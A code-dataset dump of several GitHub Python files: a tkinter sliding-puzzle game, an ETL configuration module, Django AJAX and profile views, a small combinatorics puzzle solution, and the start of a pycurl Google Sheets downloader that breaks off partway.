rename(self, nom, top=0):\r\n        \"\"\"\r\n        to rename the windows\r\n        :param nom:\r\n        :return:\r\n        \"\"\"\r\n        if top == False:\r\n            self.root.title(nom)\r\n        elif top == True:\r\n            self.top.title(nom)\r\n\r\n    def screen_shot(self, nom, extension=\".png\"):\r\n        \"\"\"\r\n        takes a screenshot\r\n        :param nom:\r\n        :return:\r\n        \"\"\"\r\n        PIL.ImageGrab.grab().save(nom + extension)\r\n\r\n    def open_image(self, nom):\r\n        \"\"\"\r\n\r\n        :param nom: with the extension\r\n        :return:\r\n        \"\"\"\r\n        photo = PhotoImage(file=nom)\r\n\r\n        return photo\r\n\r\n    def fond(self, couleur='0', methode=False, top=False, renvoie=False):\r\n\r\n        \"\"\"\r\n        changes the background color\r\n        no need to read this function, it just handles a lot of things for the easter egg\r\n        :param couleur: the desired color, or zero for random\r\n        :param methode: the method used in couleur_random()\r\n        :param top: whether we want to change the color of the top\r\n        :return: nothing\r\n        \"\"\"\r\n        if not renvoie:\r\n            if not top:\r\n                if couleur != '0':\r\n                    self.root['bg'] = couleur\r\n                elif methode != 0:\r\n                    self.root['bg'] = couleur_random(methode)\r\n                else:\r\n                    try:\r\n                        self.root['bg'] = couleur\r\n                    except:\r\n                        print('error while changing the background color')\r\n            elif top:\r\n                if couleur != '0':\r\n                    self.top['bg'] = couleur\r\n                elif methode != 0:\r\n                    self.top['bg'] = couleur_random(methode)\r\n                else:\r\n                    try:\r\n                        self.top['bg'] = couleur\r\n                    except:\r\n                        print('error while changing the background color')\r\n        else:\r\n            self.couleur_bu = couleur_random(methode)\r\n\r\n    def resolution(self, taille='1920x1080', top=False, mode='manuel'):\r\n        \"\"\"\r\n        changes the resolution\r\n        :param mode: manuel or auto\r\n        :param taille: 1920x1080\r\n        :param top: type bool\r\n        :return: nothing\r\n        if the mode is auto, this sets the resolution automatically from the screen resolution\r\n        \"\"\"\r\n        if mode == 'auto':\r\n            x = self.root.winfo_screenwidth()\r\n            y = self.root.winfo_screenheight()\r\n            taille = str(x) + 'x' + str(y)\r\n        if top == False:\r\n            self.root.geometry(taille)\r\n        else:\r\n            self.top.geometry(taille)\r\n\r\n    def actualisation(self):\r\n        \"\"\"\r\n        handles the refresh of the window and calls itself again after 50ms\r\n        for now it is used by the easter egg\r\n        :return:\r\n        \"\"\"\r\n        if self.epi:\r\n            self.fond(methode=4)\r\n            self.fond(methode=3, renvoie=True)\r\n\r\n        self.root.after(50, self.actualisation)\r\n\r\n    def f_epi(self):\r\n        \"\"\"\r\n        easter egg for the epileptic mode\r\n        :return:\r\n        \"\"\"\r\n\r\n        self.epi = True\r\n        self.actualisation()\r\n\r\n    ##############################################################################################################################\r\n    # %%spyderonly start of the Taquin zone\r\n    ###############################################################################################################################\r\n\r\n    def init_taquin(self):\r\n        \"\"\"\r\n        yes, I could put everything in init, but for simplicity and modularity I prefer to separate each initialization\r\n        \"\"\"\r\n        self.root.iconbitmap('taquin.ico')\r\n        self.couleur_bg = \"#404256\"\r\n        self.couleur_fg = 'white'\r\n        self.couleur_predefinis = False\r\n        self.couleur_rond()\r\n        self.police = Font(size=15, family='High Tower text')  # normally included with office, otherwise use Times new roman\r\n        self.afficher_nb_coup_var = False\r\n        self.nb_coup_SV = StringVar()  # SV stands for StringVar\r\n        self.inv_depla = False\r\n        self.resolution(\"1000x800\")\r\n        self.init_canevas()\r\n        self.init_bouton()\r\n        self.maj_taquin()\r\n\r\n    def init_canevas(self):\r\n        \"\"\"initializes the game canvas\"\"\"\r\n        self.can = Canvas(self.root, width=500, height=500, bd=1, relief=SUNKEN, bg=self.bg)\r\n        self.can.place(anchor=CENTER, relx=0.4, rely=0.4)\r\n\r\n        self.root.bind('<Key>', self.clavier)  # to play with zqsd or the arrow keys\r\n\r\n    def init_bouton(self):\r\n        \"\"\"our 100,000 buttons and labels\"\"\"\r\n        self.aide_nb_coup = Button(self.root, text=\"Number of moves\", bg=self.couleur_bg, fg=self.couleur_fg,\r\n                                   font=self.police, width=15, height=2, command=self.afficher_nb_coup)\r\n        self.aide_nb_coup.place(anchor=CENTER, relx=0.2, rely=0.85)\r\n        self.label_nb_coup = Label(self.root, textvariable=self.nb_coup_SV, bg=self.couleur_bg, fg=self.couleur_fg, bd=2,\r\n                                   font=self.police, width=17, height=2)\r\n        self.aide_coup_s = Button(self.root, text=\"Next move\", bg=self.couleur_bg, fg=self.couleur_fg, bd=2,\r\n                                  font=self.police, width=15, height=2, command=self.coup_suivant)\r\n        self.aide_coup_s.place(anchor=CENTER, relx=0.5, rely=0.85)\r\n        self.aide_solu = Button(self.root, text=\"Solution\", bg=self.couleur_bg, fg=self.couleur_fg, bd=2,\r\n                                font=self.police, width=15, height=2, command=self.solution)\r\n        self.aide_solu.place(anchor=CENTER, relx=0.8, rely=0.85)\r\n\r\n        self.new_eazy = Button(self.root, text=\"New game\\n Easy difficulty \", bg=self.couleur_bg, fg=self.couleur_fg, bd=2,\r\n                               font=self.police, width=15, height=4, command=self.n_eazy_fu)\r\n        self.new_eazy.place(anchor=CENTER, relx=0.8, rely=0.3)\r\n\r\n        self.new_hard = Button(self.root, text=\"New game\\n Hard difficulty \", bg=self.couleur_bg,\r\n                               fg=self.couleur_fg, bd=2,\r\n                               font=self.police, width=15, height=4, command=self.n_hard_fu)\r\n        self.new_hard.place(anchor=CENTER, relx=0.8, rely=0.55)\r\n\r\n        Button(self.root, text=\"Color\\nRandom\", bg=self.couleur_bg,\r\n               fg=self.couleur_fg, bd=2, width=6, height=3, command=self.couleur_rond_r).place(relx=0.85, rely=0.15, anchor=CENTER)\r\n        Button(self.root, text=\"Color\\nSimple\", bg=self.couleur_bg,\r\n               fg=self.couleur_fg, bd=2, width=6, height=3, command=self.couleur_rond_p).place(relx=0.75, rely=0.15, anchor=CENTER)\r\n        Button(self.root, text=\"Rules of the game\", bg=self.couleur_bg,\r\n               fg=self.couleur_fg, bd=2, width=10, height=3, command=self.rule).place(relx=0.01, rely=0.01)\r\n        Button(self.root, text=\"Invert the keys\", bg=self.couleur_bg,\r\n               fg=self.couleur_fg, bd=2, width=15, height=2, command=self.inverse_deplacement).place(relx=0.4, rely=0.04, anchor=CENTER)\r\n\r\n    def rule(self):\r\n        \"\"\"opens index.html in the browser\"\"\"\r\n\r\n        try:\r\n            import webbrowser\r\n            import psutil\r\n            url = 'index.html'\r\n            if psutil.LINUX:\r\n                # Linux\r\n                print('unix')\r\n                chrome_path = '/usr/bin/google-chrome %s'\r\n                webbrowser.get(chrome_path).open(url)\r\n            elif psutil.WINDOWS:\r\n                # Windows\r\n                print('windows')\r\n                try:\r\n                    os.startfile('index.html')  # windows\r\n                    print('at last')\r\n                except:\r\n                    chrome_path = 'C:/Program Files/Google/Chrome/Application/chrome.exe %s'\r\n                    webbrowser.get(chrome_path).open(url)\r\n                    chrome_path = 'C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s'  # windows server and old versions\r\n                    webbrowser.get(chrome_path).open(url)\r\n\r\n            elif psutil.MACOS:\r\n                print('macos')\r\n                # MacOS\r\n                chrome_path = 'open -a /Applications/Google\\\\ Chrome.app %s'\r\n                webbrowser.get(chrome_path).open(url)\r\n        except:  # google is not installed\r\n            try:\r\n                os.startfile('index.html')  # windows\r\n                print('at last')\r\n            except:  # lamenais (cmd blocked)\r\n                print('#################################################\\n you have to launch the index.html file by hand \\n #############################')\r\n\r\n\r\n    def n_eazy_fu(self):\r\n        \"\"\"\r\n        this function creates a new game with a so-called easy shuffle\r\n        the shuffle makes random moves\r\n        \"\"\"\r\n        t.melanger()\r\n        t.save_etat()\r\n        print(t)\r\n        if self.afficher_nb_coup_var:  # to hide the move-count display\r\n            self.afficher_nb_coup()\r\n        self.couleur_rond()\r\n        self.maj_taquin()\r\n\r\n    def n_hard_fu(self):\r\n        \"\"\"\r\n        this function makes a chaotic shuffle\r\n        \"\"\"\r\n        t.melange2()\r\n        t.unsave_etat(t.etat)\r\n        print(t)\r\n        if self.afficher_nb_coup_var:  # to hide the move-count display\r\n            self.afficher_nb_coup()\r\n        self.couleur_rond()\r\n        self.maj_taquin()\r\n\r\n    def afficher_nb_coup(self):\r\n        \"\"\"decides whether we show or hide the number of moves\"\"\"\r\n        if not self.afficher_nb_coup_var:\r\n            self.afficher_nb_coup_var = True\r\n            self.label_nb_coup.place(anchor=CENTER, relx=0.2, rely=0.95)\r\n            self.maj_nb_coup()\r\n        else:\r\n            self.afficher_nb_coup_var = False\r\n            self.label_nb_coup.place_forget()\r\n\r\n    def maj_nb_coup(self):\r\n        \"\"\"updates the variable (tk StringVar) that displays the number of remaining moves\"\"\"\r\n        t.save_etat()\r\n        self.nb_coup_SV.set(nb_coup_restant(t.etat))\r\n\r\n\r\n    def coup_suivant(self):\r\n        \"\"\" the save_etat calls are often done as a precaution\r\n        unsave_etat puts the taquin back to the save given as a parameter \"\"\"\r\n        t.save_etat()\r\n        c = ida(t.etat)\r\n        t.unsave_etat(c[-1])\r\n        self.maj_taquin()\r\n\r\n    def solution(self):\r\n        \"\"\"\r\n        in tkinter, sleep freezes the window, so we have to improvise\r\n        \"\"\"\r\n        self.chemin = ida(t.etat)\r\n        self.chemin.reverse()  # the list is backwards\r\n        self.root.after(200, self.solution_sleep)\r\n\r\n    def solution_sleep(self):\r\n        ''' for a dynamic display of the solution every 300ms'''\r\n        if not self.chemin:\r\n            return False\r\n        t.unsave_etat(self.chemin[0])\r\n        print(t)  # I like having a console that displays lots of stuff for debugging (since there is an interface, it is not a problem)\r\n        self.maj_taquin()\r\n        self.chemin.pop(0)  # 0 because it ends with the solution, so I treat it like a queue\r\n        self.root.after(300, self.solution_sleep)  # 300ms\r\n\r\n    def inverse_deplacement(self):\r\n        \"\"\"inverts the moves (we move based on the tile and not the zero)\"\"\"\r\n        self.inv_depla = not self.inv_depla\r\n\r\n    def maj_taquin(self):\r\n        '''\r\n        function that updates the display of the taquin\r\n        it is dirty since it deletes every element of the taquin and puts it back at its new position\r\n        we draw balls (circles) because it looks nicer\r\n        '''\r\n        self.sup_all()  # empties the canvas (it is dirty)\r\n        x = 100\r\n        y = 100\r\n        r = 70  # to have a bit of space\r\n        for i in t.liste_taquin:  # for once I actually use t.liste_taquin\r\n            if i != \"0\":\r\n                self.can.create_oval(x-r, y-r, x+r, y+r, fill=self.dico_couleur[int(i)], outline=self.dico_couleur[int(i)])\r\n                self.can.create_text(x, y, text=i, fill='white', font=self.police_ttg, anchor=CENTER)\r\n            else:\r\n                self.can.create_oval(x-r, y-r, x+r, y+r, fill='#323445', outline='#1e1f29')  # empty circle\r\n            x += 150\r\n            if x > 400:\r\n                x = 100\r\n                y += 150\r\n        if t.est_gagnant():\r\n            print('gggg')\r\n            showinfo(\"Victory\", \"Well played\", parent=self.can)  # parent makes it appear above an element, but it does not really work :)\r\n            t.melanger()\r\n            self.maj_taquin()\r\n\r\n    def sup_all(self):\r\n        \"\"\" this function empties the canvas\r\n        it is dirty but functional\"\"\"\r\n        for i in self.can.find_all():  # iterates over all the elements of the canvas\r\n            self.can.delete(i)\r\n\r\n    def couleur_rond_r(self):\r\n        \"\"\" r for random; this function is called by the button\"\"\"\r\n        self.couleur_predefinis = False\r\n        self.couleur_rond()\r\n        self.maj_taquin()\r\n\r\n    def couleur_rond_p(self):\r\n        \"\"\" p for predefined; this function is called by the button\"\"\"\r\n        self.couleur_predefinis = True\r\n        self.couleur_rond()\r\n        self.maj_taquin()\r\n\r\n    def couleur_rond(self):\r\n        \"\"\" this function chooses the colors of the circles,\r\n        either from predefined colors or from random colors based on a function from fonction_recurante \"\"\"\r\n        self.dico_couleur = {}\r\n        if self.couleur_predefinis:\r\n            liste_couleur_predefinis = [\"#FF5500\", \"#FFAA00\", \"#AAFF00\", \"#55FF00\", \"#00FF00\", \"#00FF55\", \"#00FFAA\", \"#00FFFF\"]\r\n            for i in range(1, 9):\r\n                self.dico_couleur[i] = liste_couleur_predefinis.pop(randint(0, len(liste_couleur_predefinis)-1))  # to pick a color at random\r\n        else:\r\n            for i in range(9):\r\n                self.dico_couleur[i] = couleur_random(methode = 6)\r\n\r\n    def clavier(self, event):\r\n        \"\"\" detects keyboard keys \"\"\"\r\n        touche = event.keysym\r\n        if not self.inv_depla:  # if we move the zero\r\n            if touche == \"Up\" or touche == \"z\":\r\n                t.haut()\r\n            elif touche 
== \"Down\" or touche == \"s\":\r\n                t.bas()\r\n            elif touche == \"Right\" or touche == \"d\":\r\n                t.droite()\r\n            elif touche == \"Left\" or touche == \"q\":\r\n                t.gauche()\r\n        else:  # if we do not move the zero\r\n            if touche == \"Up\" or touche == \"z\":\r\n                t.bas()\r\n            elif touche == \"Down\" or touche == \"s\":\r\n                t.haut()\r\n            elif touche == \"Right\" or touche == \"d\":\r\n                t.gauche()\r\n            elif touche == \"Left\" or touche == \"q\":\r\n                t.droite()\r\n\r\n        if self.afficher_nb_coup_var:  # if we display the number of moves\r\n            self.maj_nb_coup()\r\n        print(t)  # for debugging\r\n        self.maj_taquin()\r\n\r\n\r\n", "repo_name": "Rayandri/Slidding-puzzle-", "sub_path": "classe_tk.py", "file_name": "classe_tk.py", "file_ext": "py", "file_size_in_byte": 18284, "program_lang": "python", "lang": "fr", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 23, "usage_type": "call"}, {"api_name": "psutil.LINUX", "line_number": 268, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 272, "usage_type": "call"}, {"api_name": "psutil.WINDOWS", "line_number": 273, "usage_type": "attribute"}, {"api_name": "os.startfile", "line_number": 277, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 281, "usage_type": "call"}, {"api_name": "webbrowser.get", "line_number": 283, "usage_type": "call"}, {"api_name": "psutil.MACOS", "line_number": 285, "usage_type": "attribute"}, {"api_name": "webbrowser.get", "line_number": 289, "usage_type": "call"}, {"api_name": "os.startfile", "line_number": 292, "usage_type": "call"}]}
+{"seq_id": "42411657728", "text": "from dataclasses import dataclass, field\nfrom datetime import timedelta\nfrom numbers import Number\nfrom typing import Tuple, List, MutableMapping, Union\n\nfrom etl_engine.metastore import HWM, MetastoreABC, InMemoryMetastore, metastore_factory\n\n\n@dataclass\nclass SourceTarget:\n    schema: str = field(default='')\n    name: str = field(default='')\n    location: str = field(default='')\n    system: str = field(default='')\n    columns: List[str] = field(default_factory=list)\n    where: str = field(default='')\n    hwm: Union[HWM, MutableMapping] = field(default_factory=dict)\n\n    def __post_init__(self):\n        if self.hwm and not isinstance(self.hwm, HWM):\n            self.hwm = HWM.from_mapping(**self.hwm)\n\n    @property\n    def fqdn(self):\n        return f'{self.schema}.{self.name}'.strip('.')\n\n    def validate(self):\n        if not (self.fqdn or self.location):\n            raise ValueError('Provide (schema and name) or location.')\n        return self\n\n\n@dataclass\nclass Strategy:\n    name: str = field(default='')\n    increment: Union[None, Number, timedelta, str] = field(default=None)\n\n    def __post_init__(self):\n        if isinstance(self.increment, str):\n            key, value = self.increment.split('=')\n            self.increment = timedelta(**{key: float(value)})  # timedelta components must be numeric, not strings\n\n\n@dataclass\nclass ETL:\n    source: Union[SourceTarget, MutableMapping] = field(default_factory=SourceTarget)\n    target: Union[SourceTarget, MutableMapping] = field(default_factory=SourceTarget)\n    strategy: Union[Strategy, MutableMapping] = field(default_factory=Strategy)\n\n    def __post_init__(self):\n        if not isinstance(self.source, SourceTarget):\n            self.source = SourceTarget(**self.source)\n        if not isinstance(self.target, SourceTarget):\n            self.target = SourceTarget(**self.target)\n        if not isinstance(self.strategy, Strategy):\n            self.strategy = 
Strategy(**self.strategy)\n\n def validate(self):\n self.source.validate()\n self.target.validate()\n return self\n\n\n@dataclass\nclass SparkWrite:\n mode: str = field(default=None)\n partitionBy: str = field(default=None)\n format: str = field(default=None)\n options: MutableMapping[str, str] = field(default_factory=dict)\n\n\n@dataclass\nclass SparkRead:\n format: str = field(default=None)\n options: MutableMapping[str, str] = field(default_factory=dict)\n\n\n@dataclass\nclass Spark:\n conf: List[Tuple[str, str]] = field(default_factory=list)\n read: Union[SparkRead, MutableMapping] = field(default_factory=dict)\n write: Union[SparkWrite, MutableMapping] = field(default_factory=dict)\n\n def __post_init__(self):\n if self.conf:\n self.conf = [tuple(k_v) for k_v in self.conf]\n if not isinstance(self.write, SparkWrite):\n self.write = SparkWrite(**self.write)\n if not isinstance(self.read, SparkRead):\n self.read = SparkRead(**self.read)\n\n\n@dataclass\nclass ETLConf:\n spark: Union[Spark, MutableMapping] = field(default_factory=Spark)\n etl: Union[ETL, MutableMapping] = field(default_factory=ETL)\n metastore: Union[MetastoreABC, MutableMapping] = field(default_factory=InMemoryMetastore)\n\n def __post_init__(self):\n if not isinstance(self.spark, Spark):\n self.spark = Spark(**self.spark)\n if not isinstance(self.etl, ETL):\n self.etl = ETL(**self.etl)\n if not isinstance(self.metastore, MetastoreABC):\n self.metastore = metastore_factory(self.metastore)\n\n def validate(self):\n self.etl.validate()\n return self\n\n @classmethod\n def from_yaml(cls):\n ... # TODO\n\n @classmethod\n def from_mapping(cls, data: MutableMapping):\n return cls(**data)\n", "repo_name": "jjj4x/etl-engine", "sub_path": "src/etl_engine/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 3717, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dataclasses.field", "line_number": 11, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 12, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 13, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 14, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 15, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 15, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 16, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "etl_engine.metastore.HWM", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 17, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 17, "usage_type": "call"}, {"api_name": "etl_engine.metastore.HWM", "line_number": 20, "usage_type": "argument"}, {"api_name": "etl_engine.metastore.HWM.from_mapping", "line_number": 21, "usage_type": "call"}, {"api_name": "etl_engine.metastore.HWM", "line_number": 21, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 9, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 35, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 36, "usage_type": "name"}, {"api_name": "numbers.Number", "line_number": 36, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 36, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 41, 
"usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 33, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 46, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 46, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 47, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 47, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 48, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 48, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 44, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 66, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 67, "usage_type": "call"}, {"api_name": "dataclasses.field", "line_number": 68, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 69, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 69, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 64, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 74, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 75, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 75, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 72, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 80, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 80, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 80, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 81, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 81, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 82, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 82, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 82, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 78, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 95, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 95, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 95, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 96, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 96, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 96, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 97, "usage_type": "name"}, {"api_name": "etl_engine.metastore.MetastoreABC", "line_number": 97, "usage_type": "name"}, {"api_name": "typing.MutableMapping", "line_number": 97, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 97, "usage_type": "call"}, {"api_name": "etl_engine.metastore.InMemoryMetastore", "line_number": 97, "usage_type": "name"}, {"api_name": "etl_engine.metastore.MetastoreABC", "line_number": 104, "usage_type": "argument"}, {"api_name": "etl_engine.metastore.metastore_factory", "line_number": 105, "usage_type": "call"}, {"api_name": "typing.MutableMapping", "line_number": 116, "usage_type": "name"}, {"api_name": 
"dataclasses.dataclass", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "34900844081", "text": "from django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse\nimport json\nfrom users.models import Token\nfrom uuid import uuid4\nimport requests\nfrom django.conf import settings\n\n#------function---------------\n\ndef set_endpoint(username,endpoint):\n settings.CACHE.lset(username+'_user', 0,endpoint) \n print(\"save endpoint\")\n\ndef set_translate_api(username,ans):\n settings.CACHE.lset(username+'_user', 2,ans) \n print(\"save...\")\n\n#----------------------------\n\n@csrf_exempt\ndef sandept(request):\n # Type : request -> Json \n \"\"\"\n \n \"\"\"\n endpoint = request.POST.get('endpoint', None)\n context = {\"result\":endpoint}\n username = request.user.username\n set_endpoint(username,endpoint[1:-1])\n return HttpResponse(json.dumps(context))\n\n@csrf_exempt\ndef crt_token(request):\n token = int(request.POST.get('token', None))\n context = {\"result\":token}\n for i in range(token):\n rand_token = uuid4()\n db = Token(token=rand_token, username='')\n db.save()\n return HttpResponse(json.dumps(context))\n\n@csrf_exempt\ndef translept(request):\n endpoint = request.POST.get('endpoint', None)\n endpoint = endpoint[1:-1]\n username = request.user.username\n print(endpoint)\n # endpoint = \"https://h1e54y0sel.execute-api.us-east-1.amazonaws.com/dev/translate-text\"\n payload = {'API_Endpoint': endpoint}\n result=\"Your API is timeout. Pleas try again\"\n try:\n req = requests.request('POST', 'https://h1e54y0sel.execute-api.us-east-1.amazonaws.com/dev/translate-api',json=payload,timeout=15)\n result = req.json()[\"body\"]\n except:\n pass\n if(result==\"Your API is working perfectly.\"):\n set_translate_api(username,\"true\")\n else:\n set_translate_api(username,\"false\")\n context = {\"result\":result}\n return HttpResponse(json.dumps(context))", "repo_name": "Hank-Kuo/client_server_flow_test", "sub_path": "sandbag/app/views_ajax.py", "file_name": "views_ajax.py", "file_ext": "py", "file_size_in_byte": 1870, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.conf.settings.CACHE.lset", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.settings.CACHE", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.settings.CACHE.lset", "line_number": 16, "usage_type": "call"}, {"api_name": "django.conf.settings.CACHE", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 31, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 31, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 21, "usage_type": "name"}, {"api_name": "uuid.uuid4", "line_number": 38, "usage_type": "call"}, {"api_name": "users.models.Token", "line_number": 39, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 33, "usage_type": "name"}, {"api_name": "requests.request", "line_number": 53, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 62, "usage_type": "call"}, {"api_name": "json.dumps", 
"line_number": 62, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 43, "usage_type": "name"}]} +{"seq_id": "1759040713", "text": "from django.shortcuts import render\nfrom django.db import connection\n\n# Create your views here.\n# Create your views here.\nresponse={}\ndef index(request):\n\tcur = connection.cursor()\t\t\n\t#cur.execute('SET SEARCH_PATH to SION;')\n\tcur.execute('SELECT * FROM ORGANISASI O JOIN TUJUAN_ORGANISASI TU ON O.email_organisasi = TU.organisasi ')\n\t\n\tresponse={\n\t\t'role':request.session['role'],\n 'relawan':'relawan',\n 'sponsor':'sponsor',\n 'donatur':'donatur',\n\t\t'pengurus':'pengurus'\n\t}\n\tresponse['organisasi'] = dictfetchall(cur)\n\tcur.execute(' SELECT po.EMAIL, po.ORGANISASI FROM PENGURUS_ORGANISASI po, ORGANISASI o WHERE o.email_organisasi = po.organisasi')\n\tresponse['pengurus_org']=dictfetchall(cur)\n\n\tcur.execute(' SELECT d.donatur, d.organisasi FROM DONATUR_ORGANISASI d, ORGANISASI o WHERE o.email_organisasi = d.organisasi')\n\tresponse['donatur_org']=dictfetchall(cur)\n\n\tcur.execute('SELECT s.sponsor, s.organisasi FROM SPONSOR_ORGANISASI s, ORGANISASI o WHERE o.email_organisasi = s.organisasi')\n\tresponse['sponsor_org']=dictfetchall(cur)\n\n\tcur.execute('SELECT s.organisasi, SUM(s.nominal) FROM SPONSOR_ORGANISASI s, ORGANISASI o WHERE o.email_organisasi = s.organisasi GROUP BY organisasi')\n\tresponse['donasi_sponsor']=dictfetchall(cur)\n\n\tprint(response['donasi_sponsor'])\n\thtml='profil_organisasi/profil_organisasi.html'\n\treturn render(request, html, response)\n\n\ndef dictfetchall(cursor):\n \n\tcolumns = [col[0] for col in cursor.description]\n\treturn [\n\t\tdict(zip(columns, row))\n\t\tfor row in cursor.fetchall()\n\t]\n\n\n#SELECT organisasi, SUM(nominal)\n#FROM DONATUR_ORGANISASI\n#GROUP BY organisasi\n\n#SELECT EMAIL\n##FROM PENGURUS_ORGANISASI po, ORGANISASI o\n#WHERE o.email_organisasi = po.organisasi;\n\n\n\n\t\n\n\n\n", "repo_name": "roomay04/SION", "sub_path": "profil_organisasi/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1723, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.db.connection.cursor", "line_number": 8, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 8, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "14895792896", "text": "import itertools\ndef solution(number, k):\n answer = ''\n length=len(number)-k\n temp=[]\n for comb in itertools.combinations(range(len(number)),k):\n number2=number\n for i in comb:\n number2=number2.replace(number[i],\"\",1)\n temp.append(number2)\n return max(temp)", "repo_name": "HongDaeYong/codingStudy", "sub_path": "ayun/6_greedy/2_큰수만들기.py", "file_name": "2_큰수만들기.py", "file_ext": "py", "file_size_in_byte": 304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.combinations", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "74610402724", "text": "import pycurl\nfrom io import BytesIO \nimport certifi\nimport PIL\nimport sys\nimport os\nimport json\nimport re\n\n\nOPTS = (\"/export?format=pdf&portrait=false\" +\n \"&size=A4\" + \n \"&top_margin=0.00\" + \n \"&bottom_margin=0.00\" +\n \"&left_margin=0.00\" +\n \"&right_margin=0.00\" +\n \"&scale=4\")\ndef downloadFile(output, spreadsheetID, sheetID=0):\n if 
